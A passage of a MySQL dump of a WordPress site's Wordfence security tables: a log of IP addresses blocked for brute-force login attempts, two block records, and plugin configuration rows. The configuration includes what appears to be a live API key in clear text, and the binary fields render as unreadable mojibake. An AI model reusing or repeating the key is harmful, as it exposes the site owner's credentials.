','AR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ','AR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���갞','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���갞','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\">T','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���\">T','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Qٌ','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\"\\','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�9','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�}','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���t�','IL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���t�','IL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','RU',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���zaD','KR',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���zaD','KR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���zaD','KR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���z��','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���T�','UA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���$-I','HR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���W�\'','CZ',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��£�#','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��£�#','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����E�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����E�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����E�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����Kj','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����Kj','DE',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ÚW�','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ú��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ú��','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����T`','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����-�','IR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���)z�','ZA',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���)z�','ZA',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���)z�','ZA',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����1','TN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����1','TN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ŜJ�','ET',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����T�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',5,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',5,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',5,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ȗ��','BR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����]','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0g3','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���?�','NP',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʿ8A','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��ˉsq','JP',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖kM','TH',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��˫�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��˫�','VN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����!�','VN',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����bc','HK',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����bc','HK',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν-U','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν4�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν4�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν��','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�:','SG',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�V','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�V','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���7�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛԛ','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛԛ','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛԛ','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛԛ','DE',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛ�\\','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛ�\\','DE',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴΥ','DE',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴΥ','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���o\0:','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�u','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���W��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�','US',3,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���~h','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���~P�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���~P�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ѷ�N','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����v�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���9�8','ID',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���}z/','JP',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ӕ��','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���gM�','CH',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ԁ\0�','FR',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18866,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18869,'waf'),('\0\0\0\0\0\0\0\0\0\0����L�','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����<','SE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���_�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���_Qm','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��ՈLB','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ո]�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��իо','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��կ�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���V�','UZ',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����j','ES',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٶ��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٶ��','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���MW','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���MW','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���','HK',1,18881,'brute');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblocks7`
--
DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` int(10) unsigned NOT NULL DEFAULT 0,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`blockedTime` bigint(20) NOT NULL,
`reason` varchar(255) NOT NULL,
`lastAttempt` int(10) unsigned DEFAULT 0,
`blockedHits` int(10) unsigned DEFAULT 0,
`expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
`parameters` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `type` (`type`),
KEY `IP` (`IP`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=5025 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblocks7`
--
LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
INSERT INTO `wp_wfblocks7` VALUES (5023,2,'\0\0\0\0\0\0\0\0\0\0��E��',1631615106,'Blocked by Wordfence Security Network',1631615106,1,1631615706,NULL),(5024,2,'\0\0\0\0\0\0\0\0\0\0��[��\r',1631615566,'Blocked by Wordfence Security Network',1631615566,1,1631616166,NULL);
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfconfig`
--
DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
`name` varchar(100) NOT NULL,
`val` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfconfig`
--
LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','a:0:{}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1631823601;s:4:\"args\";a:1:{i:0;i:1631823601;}}i:1;a:2:{s:9:\"timestamp\";i:1632082801;s:4:\"args\";a:1:{i:0;i:1632082801;}}}','yes'),('apiKey','aae91138987c5e548108500fed84b7f1c24fb05e24b5245eb10d5d4314ad0b1cf4fdfdb151af47e55ccf2b2f7d8daba43136b579bc19c64c0051cc98af26935ea10c6490dde1df699e581245c44f3283','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1bc1b671f2','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#� ��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q���\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6�� �j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$� �4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��y�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{������5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u re4�+JuP$,�WN��P�2�\"Ş�,|^��y���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_� �Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W: �Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K� o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T _j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ �Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<� �h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT �!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� 